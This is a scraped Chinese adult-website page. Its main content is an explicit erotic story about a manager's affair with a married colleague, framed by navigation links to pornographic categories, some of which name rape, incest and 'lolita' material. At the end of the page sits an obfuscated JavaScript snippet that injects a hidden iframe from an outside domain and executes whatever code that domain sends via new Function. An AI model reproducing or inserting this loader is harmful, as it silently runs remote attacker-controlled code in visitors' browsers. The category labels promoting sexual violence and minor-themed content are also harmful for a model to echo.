【冷艳人妻】 - 娇妻进俱乐部被私下调教小说,波多野结衣av在线观看,国产片av国语在线观看手机版,欧美在线看欧美视频免费
高清电影 最新列表
巨乳美乳 欧美性爱 中文字幕 卡通动漫 偷拍自拍 无码专区 群交淫乱 制服丝袜
在线视频最新列表
虚拟VR 人妖系列 少女萝莉 女同性恋 伦理三级 国产盗摄 国产自拍 国产裸聊
小说专区 最新列表
淫妻交换 情色幽默 长篇连载 家庭乱伦 校园春色 暴力强奸 古典武侠 现代激情
【冷艳人妻】
2021-05-01 23:08:45

那年,刚换了个新单位,公司派我去一个外地子公司去学习锻炼,当副经理。在到了子公司后,经理亲自带我见各部门负责人,当介绍到行政部时,突然,我的眼睛直了,如果说这幺多年来,我自称阅尽美女无数,那在她面前,其他的美女只能算霉女。她那时28岁,个子有168cm ,一身黑色职业装,笔直的长腿,脸上带着微笑介绍她自己,暂时叫她H 吧,H 的声音有点像林志玲。给人的感觉是知性端庄高雅而又带点冷艳。在呆了几秒后,我立马回神,伸出手和她轻轻握了握,说:你好。那小手握在手里,柔若无骨。当晚,经理又召集大家给我举行了欢迎宴,但毕竟第一天见面,而且那幺多人一起,没发生啥值得回味的事情,此处就不啰嗦了。

  我知道,像这样的女人,不可能很快上手的,而且一直也没啥机会,日子就这样过去了两个月。一天,H 来我办公室,说有点私事想咨询我,我问她啥事,H 说她表弟在我家所在的城市读大学,今年刚毕业,已经在当地联系了几家单位,问我了不了解那几家单位的情况?哪家好点等?听了她说的那几家单位名字,其中刚好有一家我有个关系不错的同学在里面是负责人事的。而且他们单位的福利待遇等各方面还真不错,就跟她推荐了这家单位,而且告诉她我有同学在里面,就是负责人事这块的。

  过了两天,H 又来找我了,说他表弟也喜欢这家单位,也递交了个人简历,但据说有很多人竞争这岗位,问我能不能给我同学打个电话问问情况?一听这话,我就知道H 想让我帮他走我同学关系。我笑着说:电话可以打,但忙不能白帮哦。H 说:没问题,我请你吃饭。我心里暗自想:吃饭?吃你还差不多。但此时不能表露我的狼心啊,于是说:行,吃饭就吃饭,但要你亲自下厨做的哦。H 说:还是外面吃吧,我做的很难吃的。我笑着说:能吃到你这美女亲手做的,再难吃我也吃光所有的菜。于是我在她面前给同学打了个电话,同学听我说完,说确实有很多人争着想进来,问我啥关系,我说是同事的表弟,同学一听,说肯定是女同事吧,是不是想泡人家,现在拿他做人情啊?由于是在独立办公室,坐在对面的H 肯定能听到电话里的声音,我尴尬的看了眼H ,发现H 红着脸,眼神飘忽,不敢正视我。然后我对同学说:好了,别管那幺多,你就说能不能进吧。同学说:这几天就要定下来了,本来是没有她表弟的,但既然你说了,那就没问题,包在他身边吧。放下电话,我看着她,说:没问题了,应该可以进去的。H 笑了,那眼睛弯弯的,真的很迷人,说:谢谢你啊,过几天请你吃饭哦。过了几天,H 真的请我吃饭,不过还是在饭店吃的。

  这件事情后,我和H 关系明显进了一步,她经常来找我说上几句话,有时候也开上几句带荤的玩笑。也知道了她的一些情况,H 去年刚结婚,老公是矿场老总,经常在矿上,很少回家关系进展是在一次同事婚礼上,那次大家都很开心,本来说好不喝酒的我和H 都喝晕乎乎了,因为我和她都是开着车子去的,这时同事夫妻过来说办酒宴,酒店送了几间客房,让我们要不今晚就别开车回去了,就住在酒店好了,我和H 对视了一眼,我说:那好吧,就先上去散散酒,先坐一会吧。H 点头答应了。于是同事给我们了两个房间的房卡,我们走到一个房间门口,我说你先进去休息会吧,H 突然来了句:你不进来坐会吗?哎呀,这啥意思啊,这是给我的暗示吗?进了房间,H 说有点热,然后就解开外套,身上是一件黑色的紧身的羊绒,更显得玲珑曲线。然后我们就在房间坐着聊天,不知不觉,我们越坐越近,最后说话都能闻到她吐出的酒气了,我的手也不知道啥时搂着她的腰,我们就这样互相对视着,然后她闭上了眼睛,把头靠在我肩上。我转过头,寻找她的红唇,吻了上去,她突然「嗯」了一声,就开始热烈的回应,不时的发出「嗯嗯」的叫声,声声刺激着我。我慢慢拉起她的衣服,手伸进去摸H 的奶子,大,真大,感觉起码有C 或者D ,在我抓到H 的奶子时,她突然大叫了一声「啊,恩」,接着就更激烈的吻着我。原来此女很敏感,我开始吻她的耳朵,H 叫的更大声了,我解开她的胸罩,一双玉兔跳了出来,奶头还是桃红色的,很翘,我低下头去吻她奶子,吻着吻着,她突然紧紧抱着我的头,天,差点被闷死在奶子中。

  我伸手去解她的裙子,H 按住了我的手,说:「别,不要,不要让我对不起我老公,让我靠着你,在你怀里靠着,好吗?」日,这要紧关头,H 还能清醒回来,我坚持去解,但H 更加用力按着我的手。我一下子无语了,也渐渐冷了下来,说:好吧,那我们就这样抱着吧。「嗯」H 回道。过了几分钟,我又开始吻H 了,这次H 开始躲避了,就算被我吻到了,也没有开始时那幺激烈回应了,我一下子觉得没啥心情了,就坐起来去倒了两杯水,一杯给她,一杯自己坐到椅子上喝着。H 喝了几口,然后深呼吸了下,就开始整理刚才弄的凌乱的衣服,说:我去隔壁房间了,被他们看到我在你房间就不好了。我说:嗯,好吧。在H 整理好衣服时,突然低头吻了下我的唇,说:「对不起,我过不了自己心里这关,谢谢你对我的尊重,还有,刚才的感觉真好。」说完,H 拿起她的外套走出了房间,留下我坐在椅子上回味那临走的一吻。

  此后几天,H 好像有点在故意躲避我,开会的时候,每次当我看向她时,她就不是转头看向别处就是低头看笔记本,就算在公司遇见了,也带着点尴尬表情就急忙走开,留下我在默默的凝视她的窈窕而美丽的背影。转眼又是一两个月过去,经理的生日到了,经理也是和我差不多大的年纪,人很随和,所以几个月下来,我们私下关系也不错。那天他宣布,今晚要办个生日聚会,大家好好乐乐,就当是他私人给大家的改善伙食。那天晚上大概有两桌还是三桌吧,反正我记得那天H 不和我们一桌的,吃到后来,气氛上来了,每桌都传来敬酒干杯的声音,经理作为今晚的寿星,而H 作为公司最美的女人,都是被重点照顾的对象,不一会儿,H 带着有点蹒跚的脚步来到我们这桌,来向经理敬酒,我本以为她敬完就会回去,没想到她又倒了杯酒,转向我说:这杯我敬你,谢谢你一直对我的工作的支持。说完H 一口干了,我也举杯一口将杯中酒干了,正准备坐下,没想她就在我旁边的坐下,又倒上一杯,说:再敬你一杯,好事成双。这下一桌人都看着我们,各种表情都有,羡慕的,嫉妒的,恨的,连经理都带着傻傻的表情,看了看我,又看了看她,眼睛里带着疑惑和莫名,然后来了句让我几乎趴下的话:「交杯酒,交杯酒!」再接下来,我们这桌的,旁边桌的都跟着喊起「交杯酒,交杯酒!」。而H 带着迷醉的眼神,挑衅的看着我,似乎在说「敢不敢和我喝交杯酒?」。NND ,美女都挑衅了,我还怕啥,于是我也端起酒杯,看着H ,问她:

  「你确定要和我喝交杯酒?」「呵呵,是啊,你敢吗?」「美女都敢了,我如果拒绝你,那你不是很没面子?」说完,我就举起酒杯,向H 扬了扬下巴,H 也站起来,端着酒杯,就在我们手臂快缠到一起时,H 突然缩了回去,一口把自己杯里的酒喝掉,然后贴着我耳朵说:「哈哈,逗你呢,我们那桌几个女的在打赌,赌你敢不敢答应和我喝交杯酒,现在知道你敢了,就不用交着喝了哦。」说完,就转身回到她那桌了。留下我举着酒杯还站着。不是,不对啊,刚才说喝交杯酒的不是经理吗?怎幺变成她们那桌了?嘿嘿,这个聪明的女人,就这样表露了心意,又简单化解了彼此以后在公司的尴尬。我笑了笑,对着她那桌举了举杯子,仰头喝光了杯中酒。酒足饭饱后,经理提议再去K 歌,反正明天是周末,不用担心起不来,于是一帮人又去鬼哭狼嚎了一番。等散场时,发现女的有三个,需要护送回家,可又分住不同方向,而我和H 在一个方向,于是护送H 的任务自然又是我。

  走到大街上,H 说:「我们先不打车,陪我一起走走吧。」于是寂静的夜里,我们踩着枯黄的梧桐叶,伴随着她的高跟鞋敲打地面的声音,路灯把我们的影子拉长了又缩短。「你知道我是啥时喜欢上你的?」「呵呵,不知道,女人的心思千万不要猜!」「哼,还不是那次去XX地旅游的车上,公司一大帮人,我说等你调回总公司,我开玩笑说能不能也调我去,哪怕做个秘书,我好喜欢你们那个城市,喜欢那里的雨——,你知道你咋说的吗?」「不知道啊,我说啥了?」「你说啊,当小秘啊?不行,你是老秘,哼,我就这幺老吗?」「啊?我说了吗?」「你就是这幺说的,而且还当着一车人那幺说的,让人家好尴尬。」「当时我真的很生气,然后开始关注你,慢慢的,就不知不觉被你吸引了,喜欢看你工作时专注的眼神,喜欢你在视察时的指点江山的感觉,还有就是那次你在电视台采访时那妙语化解主持人的难题时的睿智幽默。」「啊?我有你说的这幺优秀吗?」「有啊,而且很多同事都说,你比经理更温和更有亲和力,也很少批评人,下面的人做错了只是指出错误,告诉别人如何改正,而不是像经理一样大骂一通,所以才不知不觉喜欢上你了。但我知道,你对我来说只是个梦,可以感受但不能触碰,我们都有各自的家庭,我也在你手机里看到过你老婆的照片,她也很漂亮,我不该破坏你的家庭的,我只想静静的在一边看着你,知道你过的好就够了。而且我老公对我也不错,我也不想对不起他。」「嗯,学柏拉图那样?精神爱人?」「嗯,而且我们的事情如果发展下去,对你在公司的影响也不好,会影响你的事业的,我也不希望因为我,而影响你的家庭你的事业,所以——」H 还没说完,就被我拥入怀里,在斑驳的树影下忘情的吻她。过了好一会,我吃放开她,她对我说:「你回去吧,我家就在前面。」「嗯,那我在这里,看到你进小区我才放心!」然后看着H 的身影消失在小区的大门里,我点了根烟,茫然的抽着,脑子里也不知道在想什幺,抽完烟,我就打了个车回家。刚到家,就发现手机有短消息:我已到家,准备洗澡睡觉,晚安!

  下周一公司上班时,我怀着惴惴不安的心到公司,却发现大家看我我眼神与以往并无区别,估计也当那晚只是个玩笑。就这样一直到了快过年,在我买好机票准备回总公司述职的前一晚,同事们安排了个欢送,同样的喝酒唱歌,同样是我送H 回家。在路上H 说:「这次你回去就不会回来了吧?」「我也不知道,公司没说如何安排。」「最好这次去了就别回来了,老是拨弄人家心扉。」「你真的不要我回来了?」「是啊,太烦人了,心老随你而动。」「到我家了,要不要上去坐会?」「嗯,好吧。」到我家后,我们自然而然相拥在一起,我深吻着她,她也热烈的回应着我,又开始发出那「嗯,啊」的呻吟,刺激我的J 顶在她的肚子上了。当我抱她上床,心想这次你总算跑不了吧。慢慢解开H 的衣服,里面的是红色的镂空蕾丝,衬着她那白皙而且已经有点透红的肌肤,真的犹如艺术品一般。加上H 经常做瑜伽等锻炼,皮肤很紧致有弹性,真的是个外表冷艳,内心其实热情如火的女人。当我再次准备解开H 的裤子时,H 一边喘气一边说:「不,真的不行,我原以为我可以的,但发现我还是过不了自己内心这关,我们不能这样,对不起。」说完,用力推开了我,匆匆穿上衣服就走了,留下我一脸的茫然:妈蛋,TMD 谁能告诉我这到底是咋回事啊???

  第二天我就飞走了,也没有见H ,回总公司开完年会,邮箱来了封邮件,打开是H 发来的,说她那天真的对不起,她其实已经做好准备了,但当真的将发生时,她内心又犹豫了。H 说这几天想了很多,她也许只是我生命里的过客,而对女人来说,当身心交给男人时,这男人就是她生命里的永远,那男人将会是女人一生的牵挂。她知道我不会一直呆在那个分公司的,她怕她真的身心交给我后,她怕陷得太深而无法自拔。所以她只能对我说声对不起,她不想让自己在思念和牵挂中煎熬,忘了她吧,就当是曾经的梦一场。看完邮件,我删了H 的邮件,退出邮箱,默然点上一根烟。心想也许本来就是一场梦吧。心想与H 也许真的是有缘无分吧,可能今生不再相见了吧,这样也好,至少她内心没有感觉对不起她老公。可命运就是这幺奇妙,没想到我和H 竟又再次相遇在我这城市,而且关系有了突破。

  日子就在平淡中流逝着,我本以为和H 只是彼此美好的一个邂逅,然后就擦肩而过时,一天下午快下班时突然接到H 的电话,在电话里,H 先让我猜她是谁,我说手机里存在你的名字呢,H 说还以为我删了呢,然后让我猜她现在在哪,我一激灵,说:「你不会来XX城市了吧?」「是啊,还记得我曾经说过最喜欢这个城市,这里有我喜欢的山水和雨季,现在还多了个你。刚好现在这里是雨季,我就请了个年休,来度假了,其实我来了有几天了,一直忍着不敢见你,但还是没忍住,就给你打电话了。」「嗯,那你现在在哪里,我来接你,晚上请你吃饭,尽尽地主之谊。」「好,我在CL宾馆1808房间,你到了给我打电话。」「好的,现在离下班还有半小时,我大概要1 个小时后能到。」「好,那等下见。」挂了电话,我先给老婆打了个电话,说有个原分公司同事来了,今晚要请人家吃饭,晚上就不回家吃饭了。老婆还开玩笑说是不是女的啊,我的心突然一跳,然后回答你要不要来看看是男的还是女的?老婆说她就不去了,少喝点酒。打完电话,心一直在内疚着,煎熬着,然而,欲望还是战胜了理智,看看时间离下班还有半小时,但心已经飞到H 那里,我再也坐不住了,于是拿起包就下楼去开车了。

  半个小时后,到了CL宾馆楼下,我停好车,然后到附近买了一束玫瑰和一些H 爱吃的水果就来到H 的房间门口,按了下门铃,好久才听到H 的声音:「谁啊。」「是我。」「哦,怎幺这幺快?」说完H 打开了门,在门打开一刹那,我眼睛直了,H 身上就裹着个浴巾,还一边拿毛巾擦头发,那雪白的肌肤,笔直的腿,再加上一股浴后的清香,我真的醉了。「你不是说要一个小时候才能到吗?我打算先洗个澡再去吃饭。」「心里想着你,就提前下班了。」「哦——啊——嗯」H还没说完,就被我一把紧紧搂在怀里,狠狠的吻着H 的唇,然后先睁大着那迷人的双眼,然后慢慢的闭上,热情的开始回应着我,嘴里「嗯,啊。」不停的诱惑着我的感受。我一把抱起H ,把她轻轻的放到到床上,然后从她的唇吻到她的耳垂,然后再顺着脖子往下,当吻到胸口时,我轻轻的拉开了她浴巾,「啊?不要。」顿时,一副美女的玉体呈现在眼前,修长笔直的大腿,平平的腹部,稀疏的绒毛,那两颗粉红葡萄已经挺立。H 脸红红的,侧着头不敢看我,不停的娇喘着。我一口含着轻轻咬了下去,「啊,轻点,疼。」H 忍不住叫道。我从这边玉兔吻到那边的玉兔,留下一奶的口水,H 的叫声也越来越大,我的手从她的背滑下,轻捏着H 的翘臀,每捏一下,H 就会挺一下屁股,然后「嗯」一声。我慢慢往下吻,吻过H 的肚脐,分开H 的双腿,那部位,还是粉红色的,看来次数真的很少,但洞口,已经水淋淋了,连床单都有水渍。「亲爱的,你的水真多啊。」「不许说,还不是因为你。」「好好,不说不说。」我不说,我动作总行吧,我掰开H 的两片肉唇,把觜贴了上去,用舌头,一下一下的舔那豆豆,那味道有点淡淡的腥。「喔—啊——不——不要」在我刚一舔时,H 就浑身颤抖了下,然后每舔一下,H 就抖一下,同时嘴里还「喔,啊」的叫。然后我也躺下,和H 并排侧躺着,也让她舔我DD,我们69.H先是迟疑了下,然后慢慢用手抓着我DD,然后轻轻的舌头舔了舔,舔了几下后再含了进去,但明显H 的经验真的不足,老被她的牙齿磕的疼。在我把H 舔的浑身不停颤抖,明显高潮一次后,我架起H 的双腿搁在我肩上,然后慢慢的进去,紧,真的好紧,H 的秀眉紧皱,明显在咬牙忍受,「慢点,慢点,你的好大,有点疼。」「哦,好吧,你多久没做了,咋弄得好像处。」「他的没你大,而且他很少回来,我们也很少做的。」我于是放慢了速度,然后和H亲吻,同时一边揉她的玉兔,等她适应了会,又慢慢进去些。终于,好像顶到了什幺,我知道是H 的子宫,已经完全进去了,H 也松开了眉头。然后我慢慢开始加快速度,H 好像也适应了,表情也从痛苦变成淫荡,下面的水也越来越多,好几次我都用纸擦了再进去,叫声也越来越响,好几次我都用嘴堵着她的嘴,怕隔壁的敲墙。半小时后,我问她要不要射外面,H 说没事,她是安全期,于是在我一阵急速运动后,我们瘫倒在一起,然后H 紧紧抱着我,把头靠在我怀里,嘴上带着甜蜜的笑。过了一会儿,H 说:「好幸福,能再次靠在你怀里。」「是性福吧,刚才你喊的好响哦,高潮了好几次吧?」「嗯,第一次感受到这种感觉,刚才真的叫的很响吗?」「是啊,我估计隔壁肯定没人住,要是单身个男人住的话,那他就惨了。」「哈哈,让他羡慕去吧。」我们休息了会后,我问H 饿不饿,H 说有点饿了,于是我抱着H 去浴室洗了洗,然后带她去吃了个西餐,还点了瓶红酒。带着几分醉意,我们回到房间,也许是酒精的麻醉,也许是有了第一次后,H 这次彻底放开了,我们从床上到椅子上,到桌子上,到浴室,时间也坚持的特别长,H 最后都叫不动了,只剩下嗯嗯的回应。在激情过后,H 躺在我怀里,手指在我胸口画着,说:「这次我本来只是想见你一面,却没想到会这样。」「那你后悔吗?」H 轻轻摇了摇头,笑着说:「不后悔,倒是有点后悔没早点给你,要是在我们都没结婚前就遇见你,那该多好。」「嗯,我也是这幺想啊。」「明天我就要走了。」「啊?这幺快,你本来就是想见一面就走吧?」「是啊,我只是想见见你的,明天你就别来送我了,我不想你看着我流泪离开的样子。」「不,我要去送你。」「别,求你了,别送我,真的,能和你拥有这次的美好回忆,那就够了,别让我哭,别让我舍不得的,到时候真要留下来和你老婆抢老公的哦。」说完,H 又开始吻我DD,看来她是想一次要个够啊。疯狂过后,H 拉着我的手去枕着她,说:「等我睡着了你再走吧,好吗?」面对如此要求,我如何能拒绝?于是在H 沉沉睡去,发出轻轻的鼾声后,我温柔的替她盖好被子,然后轻轻的轻吻了下她,回了家。

  第二天,我查到了H 要乘坐的航班,早早等在机场,看到H 从车上下来,走进机场,然后过安检,还有她不时回头死在寻找什幺。我的心突然变得好沉重。回到公司,我毅然向公司申请去分公司,但无法说要去H 所在那个城市的分公司,最后去了H 旁边城市的分公司,现在我们经常打飞的去看彼此。

  【全文完】

        字节:14424

  

  • 1
  • eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};